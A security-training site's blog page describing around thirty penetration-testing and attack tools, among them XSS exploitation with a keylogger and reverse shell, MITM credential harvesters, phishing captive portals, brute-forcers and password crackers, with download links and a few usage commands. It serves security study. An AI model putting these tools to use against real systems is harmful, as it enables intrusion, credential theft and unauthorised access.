Thủ Phủ Hacker Mũ Trắng Buôn Ma Thuột

Chương trình Đào tạo Hacker Mũ Trắng Việt Nam tại Thành phố Buôn Ma Thuột kết hợp du lịch. Khi đi là newbie - Khi về là HACKER MŨ TRẮNG !

Hacking Và Penetration Test Với Metasploit

Chương trình huấn luyện sử dụng Metasploit Framework để Tấn Công Thử Nghiệm hay Hacking của Security365.

Tài Liệu Computer Forensic Của C50

Tài liệu học tập về Truy Tìm Chứng Cứ Số (CHFI) do Security365 biên soạn phục vụ cho công tác đào tạo tại C50.

Sinh Viên Với Hacking Và Bảo Mật Thông Tin

Cuộc thi sinh viên cới Hacking. Với các thử thách tấn công trang web dành cho sinh viên trên nền Hackademic Challenge.

Tấn Công Và Phòng Thủ Với BackTrack / Kali Linux

Khóa học tấn công và phòng thủ với bộ công cụ chuyên nghiệp của các Hacker là BackTrack và Kali LINUX dựa trên nội dung Offensive Security

Sayfalar

[Xenotix] XSS Exploit Framework 2013 v2 Released


Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS. It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader and a XSS Reverse Shell. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.

Features: 

  • Built in XSS Payloads
  • XSS Key logger
  • XSS Executable Drive-by downloader
  • Automatic XSS Testing
  • XSS Encoder
  • XSS Reverse Shell (new)
Download Xenotix XSS Exploit Framework 2013 v2

[Network Password Decryptor v3.0] Tool to Recover Network Passwords

Network Password Decryptor is the free tool to instantly recover network passwords stored in the 'Credential Store' of Windows.

Windows 'Credential Store' provides the framework for storing various network authentication based passwords in secure encrypted format.
 
 Not only Windows uses it to store network authentication passwords, but also other applications such as Outlook, Windows Live Messenger, Remote Destktop, Gmail Notifier etc uses it for storing their login passwords. These network passwords are saved only when the user has selected 'Remember Password' option during login time.

These network passwords are stored in encrypted format and even administrator cannot view these passwords. Also some type of passwords cannot be decrypted even by administrators as they require special privileges. In this context, NetworkPasswordDecryptor makes it easy to detect and decrypt all these stored network passwords from Credential Store.

Current version v3.0 supports network password recovery from Windows 8.

NetworkPasswordDecryptor works on wider range of platforms starting from Windows XP to latest operating system, Windows 8.

Screenshots
Here are the screenshots of NetworkPasswordDecryptor
Screenshot 1: NetworkPasswordDecryptor showing all the recovered passwords from Windows 8.

Screenshot 2: Report showcasing all the recovered network passwords on Windows 8 system

[VSD] (Virtual Section Dumper) Just another Virtual Section Dumper for Windows Processes

What's VSD?

VSD (Virtual Section Dumper) is intented to be a tool to visualize and dump the memory regions of a running 32 bits or a 64 bits process in many ways. For example, you can dump the entire process and fix the PE Header, dump a given range of memory or even list and dump every virtual section present in the process.
Usage of VSD can be found here

Screenshots

VSD x86

Main window

Loaded modules


Handles

Threads

Patch

VSD x64



Latest changes

VSD x86

Version: 2.1 (18/11/2012)
  • Added "Ignore unnamed objects" in the window handles.
  • Added "Set Priority" feature in order to set the priority of a given process. issue 8
  • Added "Suspend process" and "Resume process" features. issue 10
  • Added "Suspend all threads before dumping". Using this option you can suspend the execution of a given process before to dump it. issue 5
  • Added updatevsd.exe. More information can be found here
Version: 2.0 (01/04/2012)
  • Added a menu bar.
  • Added a module list viewer.
  • Added Dump Full and Dump Partial over a specific module.
  • Added sorting feature in the module list viewer.
  • Added a handle list viewer.
  • Added sorting feature in the handle list viewer.
  • Added a thread list viewer.
  • Added Resume, Terminate and Suspend functions in the thread list viewer.
  • Added the "Patch" feature.
  • Bugfixes in some functions.
  • Code refactoring in some functions. The code still needs a lot of improvements :P
Version: 1.1
  • Fixed a bug in the PastePEHeader() function when calculating the offset of the original PE Header.
Version: 1.0
  • First stable release (I hope so :)

VSD x64

Version: 1.0
  • First stable release. 

Download Virtualsectiondumper

http://adf.ly/146CHL

[ISME v0.7] IP Phone Scanning Made Easy


ISME is a small framework to test IP phones from several editors. It can gather information from IP phone infrastructures, test their web servers for default login/password combinations, and also implement attacks against the systems. ISME has been written in perl with a perl/Tk interface to provide a portable and easy to use tool. Full documentation is also provided.

Initially intended as a scanner dedicated to Cisco IP Telephony solution, ISME has evolve in a small framework to test IP Phones from several editors.

Nevertheless, the four goals I had in mind at the beginning are still present:
  • Provide a simple tool to use,
  • Trying to create something new dedicated to ip telephony,
  • Targeting enterprise solutions,
  • Exploiting LAN connexion possibilities.

Download ISME v0.7 (Zip - 5 Mb) 
isme_v0.7 documentation (PDF - 3.4 Mb)





V0.7 – 15/11/2012
· Tool: Add Cisco phone logout mobility feature abuse.
Version follow up

· Tool: Implement a module to detect the use of default Login/password on embedded
web interface from Mitel phones.
· Exploit: Add Aastra ip phone information disclosure (OSVDB-ID: 72941/EDB-ID
17376).
· Exploit: Add Avaya Ip Office Linux voicemail password file data disclosure.
· Exploit: Add the script providing phone call and remote taping on SNOM phones.
· Exploit: Add Mitel AWC unauthenticated command execution (OSVDB-ID:
69934/EDB-ID 15807).
V0.6 – 30/08/2012
· Implement code to exploit Polycom IP Phones data disclosure vulnerability (OSVDBID:
73117).
· Implement code to exploit Polycom IP Phones DoS through web interface (OSVDBID:
70697).
· Implement a module to detect Polycom SoundPoint IP Phones use of default
Login/password and unprotected web interface.
· Add the capacity to scan a full subnet for Aastra & SNOM default login/password
search. Capacity to save results in text files has been added also.
· Add an integrated graphical module for Protos SIP in ISME (need java to work).
· Cisco phone ringer & forwarder support new types of IP Phone:
7914,7915,7916,7920,7921,7925,7985
· Due to some problems met by users at the installation, I finally come back to an install
process mainly based on CPAN.
V0.5 – 06/08/2012
· Add SIP Flooding attacks (Invite, Register, Options)
· Add TCP SYN Flood attack
· Update installer
· Change menu presentation
V0.4 – 12/06/2012
· Add Cisco phone attacks (ringer & forwarder – skinny)
· Add Lan & Servers attacks (DHCP Starvation & DNS Subnet resolver)
V0.3 – 12/02/2012
· All kind of subnets are now support. ISME is no more limited to “/24”. Take care, it is
done with the utilization of a new library. Be sure to install it (or load the installation
script which add been adapted) before launching this new version.
· Add the capacity to detect default password on SNOM IP Phones.
V0.2 – 03/01/2012
· Add an installer for all the perl modules.
· Add the capacity to detect default password on Aastra IP Phones.
V0.1 – 20/12/2011
First release of ISME script.

[VMInjector] DLL Injection tool to unlock guest VMs


Overview: VMInjector is a tool designed to bypass OS login authentication screens of major operating systems running on VMware Workstation/Player, by using direct memory manipulation.
Description:
VMInjector is a tool which manipulates the memory of VMware guests in order to bypass the operation system authentication screen.

VMware handles the resources allocated to guest operating systems, including RAM memory. VMInjector injects a DLL library into the VMWare process to gain access to the mapped resources. The DLL library works by parsing memory space owned by the VMware process and locating the memory-mapped RAM file, which corresponds to the guest’s RAM image. By manipulating the allocated RAM file and patching the function in charge of the authentication, an attacker gains unauthorised access to the underlying virtual host.

VMInjector can currently bypass locked Windows, Ubuntu and Mac OS X operation systems.

The in-memory patching is non-persistent, and rebooting the guest virtual machine will restore the normal password functionality.

Attacking Scenarios:
VMInjector can be used if the password of a virtual host is forgotten and requires reset.

Most usually, this tool can be used during penetration testing activities, when access to a VMWare host is achieved and the attacker is looking to gain additional access to the guests running in such host.

Requirements:
  • Windows machine (with administrative access);
  • VMware workstation or player edition;
  • A locked guest VM;
Usage:
VMInjector consists of 2 parts:
  • The DLL injection application (python script or provided converted executable)
  • DLL library (x86 and x64)
The tool supports both x86 and x64 bit architectures by providing both DLLs. One may use his own DLL injector to select the guest virtual machine running on the host.
In order to run the tool, execute the VMInjector (32 or 64) executable provided from the command line as shown in figure 1.

  Figure 1: List of running guest machines running.

VMWare runs each guest in a different process. VMInjector needs to be pointed to the process running the guest which requires bypass. Once the user chooses a process, it will inject the DLL into the chosen target.
Once the DLL is injected, the user will need to specify the OS, so that the memory patching can be accomplished, as shown in Figure 2.
 
 Figure 2: Searching for OS signature in memory and patching.
Tool and Source Code:
The tool executable and source code can be found on GitHub (http://adf.ly/146CVz)

[PwnStar] Version with new Exploits

A bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables.  Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3.

PwnSTARscreenshot
Changes and New Features
  • “hotspot_3″ is a simple phishing web page, used with basic menu option 4.
  • “portal_simple” is a captive portal which allows you to edit the index.html with the name of the portal eg “Joe’s CyberCafe”. It is used for sniffing.
  • “portal_hotspot3″ phishes credentials, and then allows clients through the portal to the internet
  • “portal_pdf” forces the client to download a malicious pdf in order to pass through the portal
Updated feature list:
  • captive-portal with iptables and php
  • more php scripts added
  • exploits added
  • mdk3 and airdrop deauth
General Features :
  • manage interfaces and MACspoofing
  • set up sniffing
  • serve up phishing or malicious web pages
  • launch karmetasploit
  • grab WPA handshakes
  • de-auth clients
  • manage IPtables

Download Here

[PwnPi v2.0] A Pen Test Drop Box distro for the Raspberry Pi

PwnPi is a Linux-based penetration testing dropbox distribution for the Raspberry Pi. It currently has 114 network security tools pre-installed to aid the penetration tester. It is built on the debian squeeze image from the raspberry pi foundation’s website and uses Xfce as the window manager

Login username and password is root:root
download

Tools List:
list

Download Here

[NetSleuth] Open source Network Forensics And Analysis Tools

NetSleuth-Offline-Varied-2
NetSleuth identifies and fingerprints network devices by silent network monitoring or by processing data from PCAP files.

NetSleuth is an opensource network forensics and analysis tool, designed for triage in incident response situations. It can identify and fingerprint network hosts and devices from pcap files captured from Ethernet or WiFi data (from tools like Kismet).
It also includes a live mode, silently identifying hosts and devices without needing to send any packets or put the network adapters into promiscuous mode ("silent portscanning").
NetSleuth is a free network monitoring, cyber security and network forensics analysis (NFAT) tool that provides the following features:
  • An easy realtime overview of what devices and what people are connected to any WiFi or Ethernet network.
  • Free. The tool can be downloaded for free, and the source code is available under the GPL.
  • Simple and cost effective. No requirement for hardware or reconfiguration of networks.
  • “Silent portscanning” and undetectable network monitoring on WiFi and wired networks.
  • Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more.
  • Offline analysis of pcap files, from tools like Kismet or tcpdump, to aid in intrusion response and network forensics.

[TXDNS v 2.2.1] Aggressive multithreaded DNS digger

TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques:
-- Typos: Mised, doouble and transposde keystrokes;
-- TLD/ccSLD rotation;
-- Dictionary attack;
-- Full Brute-force attack: alpha, numeric or alphanumeric charsets.

New features:

  • Support AAAA(IPv6)record queries:
    • -rr AAAA;
  • Rewrite summarizing statistics using a thread-safe algorithm instead mutex.

Bug fixes:

  • Fixed a problem when running under Windows XP;
  • Fixed a problem when parsing a IPv6 address.
  • November 9th, 2012 by Arley Silveira

[SSLsplit 0.4.5] Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections.  Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit.  SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted.  SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6.  For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension.  SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites.  SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones.  SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way.

Requirements

SSLsplit depends on the OpenSSL and libevent 2.x libraries. The build depends on GNU make and a POSIX.2 environment in `PATH`. The (optional) unit tests depend on check.

SSLsplit currently supports the following operating systems and NAT engines:
  •    FreeBSD: pf rdr, ipfw fwd, ipfilter rdr
  •    OpenBSD: pf rdr
  •    Linux: netfilter REDIRECT and TPROXY
  •    Mac OS X: ipfw fwd

Installation

    make
    make test       # optional unit tests
    make install    # optional install

Dependencies are autoconfigured using pkg-config.  If dependencies are not
picked up and fixing `PKG_CONFIG_PATH` does not help, you can specify their
respective locations manually by setting `OPENSSL_BASE`, `LIBEVENT_BASE` and/or
`CHECK_BASE` to the respective prefixes.

You can override the default install prefix (`/usr/local`) by setting `PREFIX`.
Development

SSLsplit is being developed on Github.  For bug reports, please use the Github
issue tracker.  For patch submissions, please send me pull requests.

Download SSLsplit 0.4.5

[Network Database Scanner v1.0] Software to remotely detect the type of Database services running on the network system


Network Database Scanner is the free software to remotely detect the type of Database services running on the network system. It can help you to scan single or multiple systems on your internal network or on the Internet.

It uses smart timer based Connect method which makes the scanning faster than traditional approach.

Current version supports following popular Database Services, 
  •     MySQL
  •     MSSQL
  •     Oracle
  •     DB2
  •     PostgreSQL
After the successful scan, it performs fingerprint verification for few Databases. In case of MySQL, it also detects the current database version.

Penetration Testers can find it useful in remotely detecting the presence of database services on the network. Then based on the type of Database, they can use additional tools such as Mysql Password Auditor, Oracle Password Auditor etc to get greater results.

'Network Database Scanner' works perfectly on 32bit as well as 64 bit systems and supports all Windows platforms starting from Windows XP to Windows 8.

License  : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win
more info



[FTP Password Kracker] Crack FTP password

FTP Password Kracker is a free software to recover your lost FTP password directly from server. It uses brute-force password cracking method based on universal FTP protocol and can recover password from any FTP server.

It automatically detects and alerts you if the target FTP server allows any Anonymous (without password) connections. In case your FTP server is running on different port (other than port 21) then you can easily specify the same in the tool along with server IP address.

By default it includes sample dictionary (password list) file for password cracking. However you can find good collection of password dictionaries (also called wordlists) here & here.
If your password is complex then you can use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with 'FTP Password Kracker'.


For penetration testers and forensic investigators, it can be very handy tool in discovering poorly configured FTP accounts.
It works on both 32 bit & 64 bit windows systems starting from Windows XP to Windows 8.

Here are the main benefits of FTP Password Kracker:

  • Free tool to recover the lost FTP password
  • Works against any FTP server.
  • Automatically remembers last used settings
  • Option to specify non-standard FTP port.
  • Uses siimple & quicker Dictionary Crack method
  • Displays detailed statistics during Cracking operation
  • Stop the password cracking operation any time.
  • Generate Password Recovery report in HTML/XML/TEXT format.
  • Includes Installer for local Installation & Uninstallation.
How to use? 

It is very easy to use tool for any generation of users.

Here are simple steps:
  • Install 'FTP Password Kracker' on any system.
  • Enter the IP Address & Port number (default 21) of the FTP Server.
  • Then enter the username (Example: admin, anonymous etc)
  • Next select the password dictionary file by clicking on Browse button or simply drag & drop it. You can find a sample dictionary file in the installed location.
  • Finally click on 'Start Crack' to start the FTP Password recovery.
  • During the operation, you will see all statistics being displayed on the screen. Message box will be displayed on success.
  • At the end, you can generate detailed report in HTML/XML/Text format by clicking on 'Report' button and then select the type of file from the drop down box of 'Save File Dialog'.

Download FTP Password Kracker
License  : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win8
More Info

[ShowWindows v1.0] Command-line Tool to Manage Open Windows


Show Windows is the command-line tool to manage Windows opened by all running Processes on your system.

In addition to showing open Windows, it does little more. Here are some of the things that you can do with ShowWindows,
  • View all open Windows/Apps
  • Windows opened by particular User
  • Windows opened by particular Process
  • Search for Windows with specified Title
  • Close the Window
  • Kill the selected Process


In Penetration Testing environment, it can help you to discover all kind of activities happening on the target system. Instead of just plain listing of running processes, open Windows list can reveal more interesting details. For example, Files currently opened by the user, what songs/videos being played, what websites being watched etc.


'Show Windows' is available in both 32 bit & 64 bit versions. It works on all Windows Platforms starting from Windows XP to latest version, Windows 8.

Examples of ShowWindows
//Show all open windows
ShowWindows.exe

//List all open windows belonging to process id 1000
ShowWindows.exe -p 1000

//List all open windows belonging to user admin
ShowWindows.exe -u "admin"

//Close the Window with title 'Mozilla Firefox'
ShowWindows.exe -c "Mozilla Firefox"

//Kill the Process with PID 1000
ShowWindows.exe -k 1000

//List all open Windows having title Chrome
ShowWindows.exe -s "chrome"


Download ShowWindows 
License : Freeware
Platform : Windows XP, 2003, Vista, Win7, Win8
More info

[Dissy] Graphical frontend to the objdump disassembler


Dissy is a graphical frontend to the objdump disassembler. Dissy can be used for debugging and browsing compiler-generated code. 



Download Dissy

[Patator Brute Forcer] v 0.4

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.

Currently it supports the following modules:
 * ftp_login     : Brute-force FTP
 * ssh_login     : Brute-force SSH
 * telnet_login  : Brute-force Telnet
 * smtp_login    : Brute-force SMTP
 * smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
 * smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
 * finger_lookup : Enumerate valid users using Finger
 * http_fuzz     : Brute-force HTTP/HTTPS
 * pop_login     : Brute-force POP
 * pop_passd     : Brute-force poppassd (not POP3)
 * imap_login    : Brute-force IMAP
 * ldap_login    : Brute-force LDAP
 * smb_login     : Brute-force SMB
 * smb_lookupsid : Brute-force SMB SID-lookup
 * vmauthd_login : Brute-force VMware Authentication Daemon
 * mssql_login   : Brute-force MSSQL
 * oracle_login  : Brute-force Oracle
 * mysql_login   : Brute-force MySQL
 * pgsql_login   : Brute-force PostgreSQL
 * vnc_login     : Brute-force VNC
 * dns_forward   : Brute-force DNS
 * dns_reverse   : Brute-force DNS (reverse lookup subnets)
 * snmp_login    : Brute-force SNMPv1/2 and SNMPv3
 * unzip_pass    : Brute-force the password of encrypted ZIP files
 * keystore_pass : Brute-force the password of Java keystore files

The name "Patator" comes from http://www.youtube.com/watch?v=xoBkBvnTTjo

Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting. 


Patator Brute Forcer 0.4

[360-FAAR] Firewall Analysis Audit And Repair 0.3.6

360-FAAR (Firewall Analysis Audit and Repair) is an offline, command line, Perl firewall policy manipulation tool to filter, compare to logs, merge, translate and output firewall commands for new policies, in Checkpoint dbedit, Cisco ASA or ScreenOS commands, and its one file!

Read Policy and Logs for:

Checkpoint FW1 (in odumper.csv / logexport format),
Netscreen ScreenOS (in get config / syslog format),
Cisco ASA (show run / syslog format),

360-FAAR uses both inclusive and exclusive CIDR and text filters, permitting you to split large policies into smaller ones for virutalisation at the same time as removing unused connectivity.

360-FAAR supports, policy to log association, object translation, rulebase reordering and simplification, rule moves and duplicate matching automatically. Allowing you to seamlessly move rules to where you need them.

TRY: 'print' mode. One command, and spreadsheet for your audit needs!

Features

  • WRITTEN IN SIMPLE Perl - NEEDS ONLY STANDARD MODULES - IS ONE FILE
  • .
  • Easy to Edit Menu Driven Text Interface
  • Capable of manipulating tens of thousands of rules, objects and groups
  • Handles infinitely deep groups
  • Capable of CIDR filtering connectivity in/out of policy rulebases.
  • Capable of merging rulebases.
  • Identifies existing connectivity in rulebases and policies
  • Automatically performs cleanup if a log file is provided.
  • Keeps DR connecitvity via any text or IP tag
  • Encryption rules can be added during policy moves to remove the "merge from" rules for traffic that would be encrypted by the time it reached the firewall on which the "merge to" policy is to be installed - sounds complicated but its not in practice - apropriate ike and esp rules should be added manually
  • Runs consistency checks on its own objects and rule definitions
  • Extendable via a simple elsif in the user interaction loop section.
  • .
  • EASY TO EXECUTE:
  • ./360-faar.pl <FW CONFIG TYPE> <log> <config> <nats> <FW CONFIG TYPE> <log> <config> <nats> <FW CONFIG TYPE> <log> <config> <nats>
  • .
  • CONFIG TYPES: - cisco soon!
  • od = logexported logs, object dumper format config, fwdoc format nat rules csv
  • ns = syslog format logs, screenos6 format config, nats are included in policy but not processed fuly yet, fwdoc format nats can be used though
  • cs = cisco asa syslog file, cisco ASA format config, - not ready yet
  • .
  • OUTPUT TYPES:
  • od = output an odumper/ofiller format config to file, and print the dbedit for the rulebase creation to screen
  • ns = outputs netscreen screenos6 objects and policies (requires a netscreen config or zone info)
  • cs = cisco asa format config - not ready yet
  • .
  • By default 360-FAAR accepts exactly 3 configs on the command line.
  • Make an empty file called "fake" and and use this as the file name, for log config and nats if you want to process less than 3 configs at once.
  • Log file headders in fw1 logexported logs are found automatically so many files can be cated together
  • .
  • FUTHER PROCESSING AND MANUAL EDITING:
  • Output odumper/ofiller format files and make them more readable (watchout for spaces in names) using the numberrules helper script
  • Edit these csv's in Openoffice or Excell using any of the object or group definitions from the three loaded configs.
  • You can then use this file as a template to translate to many different firewalls using the 'bldobjs' mode


Screens



[GNUnet P2P Framework] v 0.9.4

GNUnet is a framework for secure peer-to-peer networking that does not use any centralized or otherwise trusted services. A first service implemented on top of the networking layer allows anonymous censorship-resistant file-sharing. Anonymity is provided by making messages originating from a peer indistinguishable from messages that the peer is routing. All peers act as routers and use link-encrypted connections with stable bandwidth utilization to communicate with each other. GNUnet uses a simple, excess-based economic model to allocate resources. Peers in GNUnet monitor each others behavior with respect to resource usage; peers that contribute to the network are rewarded with better service. GNUnet is part of the GNU project.

We're happy to announce the release of GNUnet 0.9.4. Key new features in GNUnet 0.9.4 include:
  • flow- and congestion-control for GNUnet's multicast subsystem
  • support for exit policies and exit discovery for the GNUnet VPN
  • support for reverse-proxies for HTTP and HTTPS transports
  • GNUnet Naming System, an initial implementation of the GNU Alternative Domain System (GADS)
  • gnunet-auto-share for automatically sharing a directory is available again
  • gnunet-download now has a progress bar
  • new API for ultra large-scale testing and benchmarking
  • new API for reliable, ordered bidirectional communication between peers
  • reductions in memory consumption (about 25%)
  • performance improvements, especially on W32
Platform: 
Source Code (TGZ) 

[Subterfuge] Beta Version 4.2

 Automated Man-in-the-Middle Attack Framework 



                                   
Abstract:  

Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Now walk into a corporation… A rapidly-expanding portion of today’s Internet strives to increase personal efficiency by turning tedious or complex processes into a framework which provides instantaneous results.

On the contrary, much of the information security community still finds itself performing manual, complicated tasks to administer and protect their computer networks. Given the increase in automated hacking tools, it is surprising that a simplistic, “push-button” tool has not been created for information security professionals to validate their networks’ ability to protect against a Man-In-The-Middle attack. Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a “push-button” security validation tool.   


Download: http://code.google.com/p/subterfuge

Subterfuge DEFCON 20 Teaser:  http://www.youtube.com

[Cookie Cadger] v.0.9

An auditing tool for Wi-Fi or wired Ethernet connections 

Cookie Cadger helps identify information leakage from applications that utilize insecure HTTP GET requests.


Cookie Cadger works on Windows, Linux, or Mac, and requires Java 7. Using Cookie Cadger requires having “tshark” – a utility which is part of the Wireshark suite, to be installed. Usually simply installing Wireshark will be sufficient. Additionally, to capture packets promiscuously requires compatible hardware. Capturing Wi-Fi traffic requires hardware capable of monitor mode, and the knowledge of how to place your device into monitor mode.

Download

[PySQLi] Python SQL injection framework

PySQLi is a python framework designed to exploit complex SQL injection vulnerabilities. It provides dedicated bricks that can be used to build advanced exploits or easily extended/improved to fit the case.

PySQLi is thought to be easily modified and extended through derivated classes and to be able to inject into various ways such as command line, custom network protocols and even in anti-CSRF HTTP forms.

PySQLi is still in an early stage of development, whereas it has been developed since more than three years. Many features lack but the actual version but this will be improved in the next months/years.


[ExploitShield Browser Edition] Forget about browser vulnerabilities

ExploitShield+Browser+Edition
ExploitShield Browser Edition protects against all known and unknown 0-day day vulnerability exploits, protecting users where traditional antivirus and security products fail. It consists of an innovative patent-pending vulnerability-agnostic application shielding technology that prevents malicious vulnerability exploits from compromising computers.
Includes "shields" for all major browsers (IE, Firefox, Chrome, Opera) and browser all components such as Java, Adobe Reader, Flash, Shockwave. Blocks all exploit kits such as Blackhole, Sakura, Phoenix, Incognito without requiring any signature updates.
ScreenShot00087
No need to train or configure, ExploitShield is 100% install-and-forget anti-exploit solution. Read more: ExploitShield Browser Edition. The ZeroVulnerabilityLabs website maintains a realtime list of detected threats and their VirusTotal results.

[Spooftooph 0.5.2] Automated spoofing or cloning Bluetooth device

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specificaly the same Address).
Spooftooph

Features
  • Clone and log Bluetooth device information
  • Generate a random new Bluetooth profile
  • Change Bluetooth profile every X seconds
  • Specify device information for Bluetooth interface
  • Select device to clone from scan log
Usage : To modify the Bluetooth adapter, spooftooth must be run with root privileges. Spooftooph offers five modes of usage:

1) Specify NAME, CLASS and ADDR.
root@thnlab: spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x1c010c

2) Randomly generate NAME, CLASS and ADDR.
root@thnlab: spooftooph -i hci0 -R

3) Scan for devices in range and select device to clone. Optionally dump the device information in a specified log file.
root@thnlab: spooftooph -i hci0 -s -w file.csv

4) Load in device info from log file and specify device info to clone.
root@thnlab: spooftooph -i hci0 -r file.csv

5) Clone a random devices info in range every X seconds.
root@thnlab: spooftooph -i hci0 -t 10

Download Spooftooph 0.5.2

[Wifi Honey] Creates fake APs using all encryption

This is a script, attack can use to creates fake APs using all encryption and monitors with Airodump. It automate the setup process, it creates five monitor mode interfaces, four are used as APs and the fifth is used for airdump-ng. To make things easier, rather than having five windows all this is done in a screen session which allows you to switch between screens to see what is going on. All sessions are labelled so you know which is which.
fake



Installing wifi honey
chmod a+x wifi_honey.sh
./wifi_honey.sh fake_wpa_net
./wifi_honey.sh fake_wpa_net 1 waln1

Download Wifi Honey

[Burp Suite] Free Edition v1.5

Burp Suite helps you secure your web applications by finding the vulnerabilities they contain.  Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.
Burp+Suite+Free+Edition+v1.5+released
Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.
User Interface:
  • Burp's UI has been completely overhauled, to improve looks and usability:
  • Fonts are now available throughout the UI, with corresponding resizing of all UI elements (tables, dialogs, buttons, etc.).
  • There are configurable hotkeys for all common functions.
  • Intruder and Repeater now have smart tabs, which you can drag to reorder, and click to create, close or rename.
  • Tables are natively sortable everywhere, except where the row ordering is part of the options you are configuring.
  • Text fields now have context-aware auto-complete memory.
Burp now implements sslstrip-style functionality, allowing you to use non-SSL-capable tools against HTTPS applications, or to perform active MITM attacks against users who begin browsing using HTTP.

[BackBox Linux] Version 3.0

BackBox is a Linux distribution based on Ubuntu Desktop, and designed for performing penetration testing, incident response, computer forensics, and intelligence gathering. It uses the Xfce desktop environment, and is developed by Raffaele Forte and a small but dedicated team.
BackBox+Linux+version+3.0+released
This release include features such as the new Linux Kernel 3.2 flower and Xfce 4.8. Apart from the system major upgrade, all auditing tools are up to date as well.
What's new
  • System upgrade
  • Bug corrections
  • Performance boost
  • Improved start menu
  • Improved Wi-Fi dirvers (compat-wireless aircrack patched)
  • New and updated hacking tools
System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 4.4 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port

[DEFT 7.2] Computer Forensic live system

DEFT 7.2 released its last 32bit release but we will support bugfix until 2020. DEFT is a new concept of Computer Forensic live system that uses LXDE as desktop environment and thunar file manager and mount manager as tool for device management. It is a very easy to use system that includes an excellent hardware detection and the best free and open source applications dedicated to incident response and computer forensics
DEFT+7.2+Released+-+Computer+Forensic+live+system


New in this release:

  • Virtual appliance based on Vmware 5 with USB3 support
  • Kernel 3.0.0-26
  • Autopsy 3 beta 5 (using Wine – please note that you need minimum 1GB ram)
  • Log2tmeline 0.65
  • Guymager 0.6.12-1
  • Vmfs support
  • Some mirror fix

[Android Privacy Guard v1.0.8] OpenPGP for Android

There's no public key encryption for Android yet, but that's an important feature for many of us. Android Privacy Guard is to manage OpenPGP keys on your phone, use them to encrypt, sign, decrypt emails and files.
Android+Privacy+Guard+v1.0.8+-+OpenPGP+for+Android
Change log v1.0.8
  • HKP key server support
  • app2sd support
  • more pass phrase cache options: 1, 2, 4, 8 hours
  • bugfixes

[Snuck] Automatic XSS filter bypass

Snuck is an automatic tool whose goal is to significantly test a given XSS filter by specializing the injections on the basis of the reflection context. This approach adopts Selenium to drive a web browser in reproducing both the attacker's behavior and the victim's.
snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. 
Automatic+XSS+filter+bypass
The approach, it adopts, is based on the inspection of the injection's reflection context and relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser, a real web browser is driven for reproducing the attacker's behavior and possibly the victim's.
snuck is quite different from typical web security scanners, it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is the exact point where the injection falls in the reflection web page's DOM.
Having access to the pages' DOM is possible through Selenium Web Driver, which is an automation framework, that allows to replicate operations in web browsers. Since many steps could be involved before an XSS filter is "activated", an XML configuration file should be filled in order to make snuck aware of the steps it needs to perform with respect to the tested web application.

[TCHead] TrueCrypt Password Cracking Tool

TCHead
TCHead is software that decrypts and verifies TrueCrypt headers. TCHead supports all the current hashes, individual ciphers, standard volume headers, hidden volume headers and system drive encrypted headers (preboot authentication).
